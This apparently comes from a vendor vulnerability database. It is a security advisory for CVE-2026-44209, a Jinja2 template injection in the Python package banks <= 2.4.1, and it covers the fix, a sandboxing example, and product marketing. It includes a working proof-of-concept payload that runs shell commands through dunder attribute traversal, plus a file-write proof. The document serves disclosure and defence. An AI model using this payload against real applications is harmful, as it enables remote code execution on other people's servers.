Summary
banks <= 2.4.1 uses jinja2.Environment() (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to Prompt() are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system.
This is a vulnerability in how banks initializes its Jinja2 environment, not in Jinja2 itself.
Vulnerable Code
In src/banks/env.py, the global Jinja2 environment is created without sandboxing:

```python
from jinja2 import Environment, select_autoescape

env = Environment(
    autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False),
    ...
)
```
Attack Scenario
An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to Prompt() is vulnerable. For example:
```python
from banks import Prompt

# User-controlled input reaches Prompt()
user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(user_input)
p.text()  # Executes arbitrary command on the host
```
Proof of Concept
Setup:

```shell
pip install banks==2.4.1
```

PoC script:

```python
from banks import Prompt

payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(payload)
result = p.text()
print(f"[+] Output: {result}")
```
Confirmed output:

```text
[+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),...
```

**File-write proof:**

```python
from banks import Prompt

p = Prompt("{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo POC > /tmp/rce_banks_exec').read() }}")
p.text()
```

```shell
ls -l /tmp/rce_banks_exec
# -rw-rw-r-- 1 ak ak 4 Apr 27 15:36 /tmp/rce_banks_exec
```
Impact
Applications that allow end-users to supply or customize prompt templates are at risk of full Remote Code Execution, including arbitrary command execution, data exfiltration, and server compromise.
Fix
Fixed in banks 2.4.2 (PR #74) by switching to jinja2.sandbox.SandboxedEnvironment, which blocks the dunder attribute traversal chain this exploit relies on.
Developers on banks <= 2.4.1 should upgrade to 2.4.2 and avoid passing untrusted user input as the template argument to Prompt().
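The two halves of the fix, shown side by side as an added example (this is not code from banks or from PR #74): a `SandboxedEnvironment` with the same autoescape options as the `env.py` snippet above, and user input passed as a template *variable* rather than as the template source. The probe string is constructed for this example; it walks the same dunder attribute chain the advisory's payload uses, but only reads `str`'s class MRO, so it executes nothing. The unsandboxed environment renders it, the sandbox aborts with `SecurityError`, and when the same string arrives as data it is echoed back as literal text.

```python
from jinja2 import Environment, select_autoescape
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Constructed probe for this example: same dunder traversal pattern as the
# advisory's payload, but it only reads class metadata and runs no command.
PROBE = "{{ ''.__class__.__mro__ }}"

AUTOESCAPE = select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False)

# Vulnerable shape (what banks <= 2.4.1 does): plain Environment.
UNSAFE_ENV = Environment(autoescape=AUTOESCAPE)

# Hardened shape (what the 2.4.2 fix switches to). Assumption: the fix keeps
# the same autoescape options; only the environment class matters here.
SAFE_ENV = SandboxedEnvironment(autoescape=AUTOESCAPE)


def render(env, template_src, **context):
    """Compile template_src in env and return the rendered text."""
    return env.from_string(template_src).render(**context)


def sandbox_refuses(template_src):
    """True if the sandboxed environment aborts rendering with SecurityError.

    The sandbox marks any attribute starting with '_' as unsafe, so the first
    dunder access yields an unsafe Undefined and the next step on it raises.
    """
    try:
        render(SAFE_ENV, template_src)
    except SecurityError:
        return True
    return False


def render_user_text_as_data(user_text):
    """The other half of the advice: untrusted text goes in as a variable,
    never as the template. Jinja2 does not evaluate expressions inside
    variable values, so a probe passed this way comes back verbatim."""
    return render(SAFE_ENV, "Summarise this for the user: {{ text }}", text=user_text)


if __name__ == "__main__":
    print("unsandboxed:", render(UNSAFE_ENV, PROBE))     # (<class 'str'>, <class 'object'>)
    print("sandbox refuses:", sandbox_refuses(PROBE))    # True
    print("as data:", render_user_text_as_data(PROBE))   # probe echoed back as text
```

Note that the sandbox is a mitigation for the attribute-traversal chain, not a licence to compile untrusted template source: a hostile template can still read whatever context variables are rendered into it, so keeping user input on the data side of `render()` remains the primary control.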
Resources
- Fix: https://github.com/masci/banks/pull/74
- CVE-2024-41950 (Haystack, identical root cause, CVSS 7.5)
- CVE-2025-25362 (spacy-llm, identical root cause)
- CWE-1336: Improper Neutralization of Special Elements in a Template Engine
Impact
CVE-2026-44209 has a CVSS score of 7.5 (High). The vector is network-reachable, requires no privileges, and requires user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.4.2); upgrading removes the vulnerable code path.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-44209? CVE-2026-44209 is a high-severity security vulnerability in banks (pip), affecting versions <= 2.4.1. It is fixed in 2.4.2.
- How severe is CVE-2026-44209? CVE-2026-44209 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of banks are affected by CVE-2026-44209? banks (pip) versions <= 2.4.1 are affected.
- Is there a fix for CVE-2026-44209? Yes. CVE-2026-44209 is fixed in 2.4.2. Upgrade to this version or later.
- Is CVE-2026-44209 exploitable, and should I be worried? Whether CVE-2026-44209 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-44209 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-44209? Upgrade banks to 2.4.2 or later.